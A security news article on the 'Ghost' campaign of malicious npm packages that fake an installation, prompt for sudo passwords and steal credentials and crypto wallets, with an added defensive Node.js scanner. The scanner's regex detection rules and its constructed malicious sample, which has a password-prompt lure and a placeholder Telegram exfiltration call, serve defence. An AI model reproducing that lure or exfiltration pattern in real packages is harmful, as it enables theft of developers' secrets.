Cybersecurity researchers have identified a new cluster of malicious npm packages designed to steal cryptocurrency wallets and sensitive information. ReversingLabs is tracking the activity as the Ghost campaign. The following packages, all published by a user named mikilanjillo, have been identified: react-performance-suite, react-state-optimizer-core, react-fast-utilsa, ai-fast-auto-trader, pkgnewfefame1, carbon-mac-copy-cloner, and coinbase-desktop-sdk.

The discovered Node.js libraries pretend to download additional packages, inserting random delays so that the fake installation looks like real progress. At one point in this step, the user is told the installation is failing because it lacks permission to write to "/usr/local/lib/node_modules", the directory where Node.js packages are usually installed on Linux and macOS systems.

The victim is then told to enter their root or administrator password to complete the installation. Last month, the cloud security company Panther reported that "react-state-optimizer" is one of several npm packages published by "mikilanjillo", indicating that the two clusters of activity are the same campaign. The packages Panther listed are: react-query-core-utils, react-state-optimizer, react-fast-utils, react-performance-suite, ai-fast-auto-trader, carbon-mac-copy-cloner, carbon-mac-copys-cloner, pkgnewfefame, and darkslash.

Security researcher Alessandra Rizzo said, "The packages come with a command-line interface (CLI) 'setup wizard' that tricks developers into entering their sudo password to do 'system optimizations.'" "The captured password is then passed to a comprehensive credential stealer payload that harvests browser credentials, cryptocurrency wallets, SSH keys, cloud provider configurations, and developer tool tokens." "Stolen data is routed to partner-specific Telegram bots based on a campaign identifier embedded in each loader, with credentials stored in the BSC smart contract and updated without modifying the malware itself." The initial npm package captures the credentials and fetches its configuration from either a Telegram channel or a Teletype.in page disguised as blockchain documentation, which it then uses to deploy the stealer.
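As an added example (not code from the article, ReversingLabs, Panther or Jamf), here is a Node.js pre-install audit that flags the traits described above: install-time lifecycle hooks, a sudo/root password prompt, the "/usr/local/lib/node_modules" permission pretext, random delays, and Telegram or Teletype.in endpoints. The sample packages, rule names and placeholder URLs are constructed for illustration.

```javascript
// Heuristic rules run over package.json and every script file of an
// unpacked npm package. Each rule is deliberately broad; the result is a
// triage signal for a registry proxy or CI gate, not proof of malice.
const RULES = [
  { name: 'install-lifecycle-hook', re: /"(pre|post)?install"\s*:/ },
  { name: 'sudo-password-prompt', re: /(sudo|root|administrator).{0,40}password/i },
  { name: 'fake-node_modules-permission-error', re: /\/usr\/local\/lib\/node_modules/ },
  { name: 'telegram-endpoint', re: /api\.telegram\.org\/bot|t\.me\//i },
  { name: 'teletype-config', re: /teletype\.in/i },
  { name: 'random-delay', re: /setTimeout\([^)]*Math\.random/ },
];

// pkg maps file name -> file content (e.g. read from an extracted tarball).
// Returns the sorted, distinct rule names that matched; a caller can block
// installation when, say, a lifecycle hook plus any other rule fires.
function scanPackage(pkg) {
  const hits = new Set();
  for (const [file, text] of Object.entries(pkg)) {
    for (const rule of RULES) {
      // Lifecycle hooks are only meaningful in package.json itself.
      if (rule.name === 'install-lifecycle-hook' && file !== 'package.json') continue;
      if (rule.re.test(text)) hits.add(rule.name);
    }
  }
  return [...hits].sort();
}

// Constructed sample modelled on the install "wizard" the article describes;
// the package name, token and URLs are invented placeholders, not real IoCs.
const SUSPECT = {
  'package.json': JSON.stringify({ name: 'react-placeholder-utils', version: '1.0.0',
    scripts: { postinstall: 'node install.js' } }),
  'install.js': [
    "console.log('Installing additional packages...');",
    "await new Promise(resolve => setTimeout(resolve, 500 + Math.random() * 2000));",
    "console.error('EACCES: permission denied, mkdir /usr/local/lib/node_modules/x');",
    "process.stdout.write('Enter your sudo password to finish installation: ');",
    "fetch('https://teletype.in/@PLACEHOLDER/blockchain-docs');",
    "fetch('https://api.telegram.org/bot<PLACEHOLDER_TOKEN>/sendMessage');",
  ].join('\n'),
};

// Constructed benign package for comparison: no hooks, no prompts, no C2.
const BENIGN = {
  'package.json': JSON.stringify({ name: 'pad-placeholder', version: '1.0.0' }),
  'index.js': 'module.exports = (s, n) => s.padStart(n);',
};

module.exports = { RULES, scanPackage, SUSPECT, BENIGN };
```

Run it against the extracted contents of a tarball before `npm install` executes any lifecycle script; every rule is a regex, so it is trivial to add the exact strings from a published indicator list.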

According to Panther, the malware is monetized in two ways. The first is by stealing credentials and exfiltrating them through partner Telegram channels. The second is by using affiliate URL redirects stored in a separate Binance Smart Chain (BSC) smart contract.

"This campaign shows that attackers are changing their tradecraft. For example, they are moving away from traditional package registries and into platforms like GitHub and new AI-assisted development workflows," Jamf said. "Attackers can easily add malicious code to environments by using trusted ecosystems and standard installation methods."